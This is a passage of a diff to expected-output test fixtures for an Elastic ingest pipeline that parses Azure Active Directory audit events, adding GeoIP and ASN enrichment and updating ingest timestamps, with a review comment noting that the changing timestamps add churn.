:\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5
.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -875,6 +935,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -1041,7 +1113,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124852900Z", + "ingested": "2021-12-14T14:48:43.176637941Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -1068,6 +1140,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
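Review bot: The new `event.ingested` value on the `+` line is a wall-clock ingest timestamp (2021-12-14T14:48:43.176637941Z replacing 2021-12-09T13:41:51.124852900Z) and is the only change in this hunk, so this expected file will differ every time the pipeline test output is regenerated; the same churn appears in the hunks at -1234, -1427, -1620, -1813 and -2006. A golden value that changes on every run adds noise to reviews and hides real parser regressions, so it is worth treating `event.ingested` as a dynamic field in the pipeline test config (elastic-package's `dynamic_fields` setting, if the version being pulled in here supports it) rather than committing a fresh timestamp each time. The enclosing JSON document starts and ends outside this hunk.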
@@ -1234,7 +1318,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124859400Z", + "ingested": "2021-12-14T14:48:43.176638575Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -1261,6 +1345,18 @@
 },
 {
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "ip": "67.43.156.15"
 },
 "tags": [
@@ -1427,7 +1523,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124866Z", + "ingested": "2021-12-14T14:48:43.176639327Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -1454,6 +1550,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -1620,7 +1728,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124872700Z", + "ingested": "2021-12-14T14:48:43.176639956Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
